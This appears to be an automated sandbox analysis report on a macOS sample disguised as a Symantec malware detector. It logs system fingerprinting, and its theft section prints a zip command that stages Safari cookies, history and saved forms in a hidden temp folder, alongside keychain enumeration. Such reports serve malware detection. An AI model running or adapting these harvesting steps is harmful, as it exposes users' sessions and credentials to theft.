Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration
Source: /bin/sh (PID: 494)Csrutil executable: /usr/bin/csrutil -> csrutil status

Language, Device and Operating System Detection:

Reads the system or server version plist file
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 504)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/sw_vers (PID: 552)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Queries OS software version with shell command 'sw_vers'
Source: /usr/bin/perl5.18 (PID: 552)sw_vers executed: /usr/bin/sw_vers -productVersion
Reads hardware related sysctl values
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.availcpu (6.25)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.ncpu (6.3)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.cpu_freq (6.15)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version value
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: kern.osversion (1.65)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: kern.osversion (1.65)
Reads the system's OS release and/or type
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.ostype (1.1)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 513)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 516)Sysctl requested: kern.osrelease (1.2)
Reads the system's hostname
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 478)Sysctl requested: kern.hostname (1.10)
Source: /sbin/route (PID: 479) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 481) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 482) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 483) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 484) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 486) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 488) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 489) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 493) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 494) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 495) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 495) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 496) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 498) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 500) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 501) | Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 506) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 509) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 511) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 514) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 517) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 519) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 521) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 523) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 525) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 527) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 529) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 530) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 531) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 532) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 537) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 539) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 543) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 544) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 545) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 546) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 547) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 550) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 553) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 554) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 555) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 556) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 557) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 558) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 559) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 560) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 562) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 563) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 564) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 565) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 566) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 567) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 568) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 569) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 570) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 571) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 572) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 573) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 574) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 575) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 576) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 577) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 578) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 579) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 580) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 581) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 583) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 585) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 586) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 587) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 591) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 592) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 593) | Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

Archives Safari's bookmarks and may steal them
Source: /bin/sh (PID: 485) | Zips Safari's bookmarks: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's cookies and may steal them
Source: /bin/sh (PID: 485) | Zips Safari's cookies: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's history database and may steal it
Source: /bin/sh (PID: 485) | Zips Safari's history DB: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's saved forms and may steal them
Source: /bin/sh (PID: 485) | Zips Safari's saved forms: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
May steal keychain information which contains credentials
Source: /usr/bin/zip (PID: 487) | Keychain directory enumerated: /Users/vreni/Library/Keychains
Source: /usr/bin/zip (PID: 487) | Keychain directory enumerated: /Library/Keychains


Runtime Messages

Command: open
Exit code: 0
Killed: False
Standard Output:
Standard Error:

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Screenshot